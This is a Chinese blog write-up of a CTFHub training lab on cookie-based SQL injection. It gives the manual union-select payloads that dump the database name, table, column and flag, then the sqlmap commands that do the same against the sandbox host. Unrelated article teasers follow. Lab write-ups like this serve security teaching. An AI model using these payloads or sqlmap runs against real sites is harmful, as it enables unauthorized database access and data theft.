CTFHUB技能树之SQL——Cookie注入

ops/2024/10/18 14:49:09/

开启靶场,打开链接:

发现没有注入点,猜测是Cookie注入


用burp抓包发送到repeater中:

先直接发送看看情况:

应该是整数型注入?毕竟默认就是id=1


判断一下字段数:

1 order by 2#

正常回显

1 order by 3#

回显错误,说明字段数是2


查看数据库位置:

1 union select 1,2#

看样子可能不在数据库中,老样子,改成-1 union select 1,2#


(1)爆数据库

-1 union select 1,database()#

得到数据库名是sqli


(2)爆表名

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'#

得到cxmdnrbzzo表和news表


(3)爆列名

-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='sqli' and table_name='cxmdnrbzzo'#

得到urweetotud列


(4)爆字段内容(flag)

-1 union select 1,group_concat(urweetotud) from sqli.cxmdnrbzzo#

得到flag:

ctfhub{c177bd6f0e338d70e4f1e63c}


sqlmap试试:

python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800/" --cookie "id=1" --level 2 --dbs

(注意:不设置level的话没法爆破出数据库信息)

爆出sqli数据库


python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli --level 2 --tables

爆出cxmdnrbzzo表了


python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T cxmdnrbzzo --level 2 --columns

(其实这一步不用爆也行,直接爆字段内容,下一步就是不写列名直接爆字段内容)

爆出urweetotud列了


python sqlmap.py -u "http://challenge-0bf292bea88ff8cd.sandbox.ctfhub.com:10800" --cookie "id=1" -D sqli -T cxmdnrbzzo --level 2 --dump

成功爆出flag


http://www.ppmy.cn/ops/126502.html

相关文章

Linux下的环境变量

目录 1.引言 1.1bash的部分工作 1.2main函数也有参数 1.3我们可以通过给main函数传入不同的参数,让同一份代码实现不同的功能 1.4先认识一个环境变量PATH,帮助Linux找到指令程序的地址 2.环境变量 2.1环境变量的概念 2.2见见其他的环境变量 2…

3D一览通常见问题QA

感谢大家一直以来对大腾智能3D一览通的支持,我们致力于提供便捷高效的3D协同服务。这里小编整理了一些关于3D一览通的常见问题,以便大家更好地了解和使用3D一览通。 Q:3D一览通的功能是什么? 3D一览通是大腾智能打造的一款云端轻…

Python --爬虫小说学习-仅限于个人娱乐

文章目录 前言一、演示二、文件目录示意三、使用步骤1.引入库2.界面控制程序3.QT业务控制程序4.批量修改文件名称 总结 前言 娱乐项目记载:爬取网络上的小说 一、演示 二、文件目录示意 三、使用步骤 1.引入库 代码如下(示例):…

C语言:符号“->”在C语言中什么意思呢?

1.C语言中符号“->”的意义: ‌指针中的->表示用于访问指针所指向的结构体或联合体的成员。‌ 这是一个操作符,通常用于简化代码,可以替代使用(*ptr).member的方式。 ->操作符的具体用法是,当你有一个指向结构体的指针时…

【AI论文精读6】SELF-RAG(23.10)P1

【AI论文解读】【AI知识点】【AI小项目】【AI战略思考】 简介 论文中英文名 Self-RAG: Learning to Retrieve, Generate, and Critique through Self-Reflection Self-RAG: 通过自我反思学习检索、生成和批判 论文地址 https://arxiv.org/abs/2310.11511 精读理由 训练了…

[ComfyUI]Flux:万圣节特献!东西方元素结合,绮梦流光-幽影灵域​

大家好!我是安琪!!今天我要向大家介绍一个超级酷炫的万圣节特献——[ComfyUI]Flux的绮梦流光-幽影灵域模型!这个模型将东西方元素完美结合,为你带来一个充满神秘和惊喜的万圣节体验! 想象一下,…

Python--WinError 2 的常见解决方案

报错信息:FileNotFoundError: [WinError 2] 系统找不到指定的文件。 这个错误提示 FileNotFoundError: [WinError 2] 系统找不到指定的文件 说明在调用 subprocess.Popen 时,系统找不到指定的文件或可执行程序。在代码中,这个问题主要是因为…

VsCode 如何自定义代码片段(Code Snippet)

前言 在现代前端开发中,提高工作效率是每个开发者的追求。Visual Studio Code(Vscode)作为一款强大的代码编辑器,提供了许多让开发者高效编程的功能,其中自定义代码片段(Code Snippet)便是一个…